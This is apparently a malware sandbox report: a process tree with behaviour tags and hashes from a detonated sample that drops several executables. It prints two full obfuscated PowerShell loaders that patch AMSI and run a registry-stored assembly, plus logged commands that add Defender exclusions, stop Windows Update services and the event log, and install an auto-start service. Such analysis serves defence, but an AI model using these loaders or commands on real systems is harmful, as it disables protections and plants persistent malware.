$_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'icro'+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+''+[Char](85)+''+'n'+''+'s'+'a'+[Char](102)+'eNat'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'h'+[Char](111)+'ds');$cjamcBWbUeiYFp=$mROtnFNlpOpQK.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+'i'+'c'+[Char](44)+''+'S'+''+[Char](116)+'a'+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lTtkaEbeIUFkELaNQrp=YzbKDlkEvoiP @([String])([IntPtr]);$tpTTDPrIyYPNIvxmSXsCEV=YzbKDlkEvoiP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NJCFRmWYWIl=$mROtnFNlpOpQK.GetMethod('G'+[Char](101)+''+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+'3'+'2'+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$GxoauuZqFwPXeM=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$NJCFRmWYWIl,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+'b'+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$mpuImyzxFAXRXzNMp=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$NJCFRmWYWIl,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$FjxjzMf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GxoauuZqFwPXeM,$lTtkaEbeIUFkELaNQrp).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+'l'+'');$zHBcEpfJFRcJRExQE=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$FjxjzMf,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+'c'+'a'+''+'n'+'B'+[Char](117)+''+[Char](102)+''+'f'+'e'+'r'+'')));$MHjpcMCHxx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mpuImyzxFAXRXzNMp,$tpTTDPrIyYPNIvxmSXsCEV).Invoke($zHBcEpfJFRcJRExQE,[uint32]8,4,[ref]$MHjpcMCHxx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zHBcEpfJFRcJRExQE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mpuImyzxFAXRXzNMp,$tpTTDPrIyYPNIvxmSXsCEV).Invoke($zHBcEpfJFRcJRExQE,[uint32]8,0x20,[ref]$MHjpcMCHxx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+''+[Char](108)+'er'+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qwLHkZXFzmKZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ympiCVUcQUIwPw,[Parameter(Position=1)][Type]$dqXuQKUBhK)$fhOoLHkPBqO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+'l'+'ega'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+'r'+'y'+[Char](77)+''+[Char](111)+'dul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+''+'l'+'a'+[Char](115)+'s'+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+'a'+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$fhOoLHkPBqO.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+'i'+[Char](103)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ympiCVUcQUIwPw).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$fhOoLHkPBqO.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+'l'+'o'+''+'t'+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+'a'+[Char](108)+'',$dqXuQKUBhK,$ympiCVUcQUIwPw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'im'+[Char](101)+''+','+''+'M'+''+'a'+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $fhOoLHkPBqO.CreateType();}$aYDMhNBIxCkso=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+'s'+'af'+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+'iv'+[Char](101)+'Meth'+'o'+'d'+[Char](115)+'');$ERyGLMwEoOOMVT=$aYDMhNBIxCkso.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JeoiWKxHehfHbSHWDxh=qwLHkZXFzmKZ @([String])([IntPtr]);$cvINplqKeNJvCwMsndbxTK=qwLHkZXFzmKZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$baolUOiMTkB=$aYDMhNBIxCkso.GetMethod(''+'G'+'e'+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+'and'+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2.d'+'l'+'l')));$rEXqfKPFSSNJzN=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$baolUOiMTkB,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+'r'+'y'+'A')));$rZORpBmFhgNwfTkSc=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$baolUOiMTkB,[Object](''+'V'+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+'a'+'lPr'+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$KFTLLdl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rEXqfKPFSSNJzN,$JeoiWKxHehfHbSHWDxh).Invoke(''+'a'+''+'m'+'s'+[Char](105)+''+[Char](46)+'dl'+'l'+'');$WxBGdKhFwpzftvLjL=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$KFTLLdl,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+'u'+'f'+'f'+[Char](101)+'r')));$SMIhvkSHmK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rZORpBmFhgNwfTkSc,$cvINplqKeNJvCwMsndbxTK).Invoke($WxBGdKhFwpzftvLjL,[uint32]8,4,[ref]$SMIhvkSHmK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WxBGdKhFwpzftvLjL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rZORpBmFhgNwfTkSc,$cvINplqKeNJvCwMsndbxTK).Invoke($WxBGdKhFwpzftvLjL,[uint32]8,0x20,[ref]$SMIhvkSHmK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('d'+'i'+''+'a'+''+[Char](108)+''+[Char](101)+''+'r'+''+[Char](115)+''+'t'+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:6084 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5080
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1456
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2568
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2180
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2272
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2776
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2836
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2876
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3444
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"2⤵
- Downloads MZ/PE file
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe"C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5684 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2616
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:5156
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4020
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4720
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3640
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:6044
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5600
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5860
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5292
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:2480
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "KPNEMLWP"4⤵
- Launches sc.exe
PID:4984
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "KPNEMLWP" binpath= "C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe" start= "auto"4⤵
- Launches sc.exe
PID:1952
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:5340
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "KPNEMLWP"4⤵
- Launches sc.exe
PID:3164
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe"C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4768
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"3⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:3504
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:1380
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:6024
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:1820
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:5816
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:4784
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:4592
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:4632
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe"C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:6012 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5788
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1356
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3672
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3868
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4040
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:444
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:5568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:5312
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3468
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1884
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3496
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:6120
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4804
-
C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exeC:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1628 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5508
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5668
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4360
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2196
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:4940
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:772
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5948
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4808
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4916
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4180
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:4988
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.8MB
MD5a4800db4a176fdba6d86bde9e21d7d4b
SHA1c927378fd0aff61a865860b81ea49182ad3fc896
SHA2564738fee480de92666fc5cb7e6c9a4b0d97cd3d3b7ff9d642288e0cc604d407ae
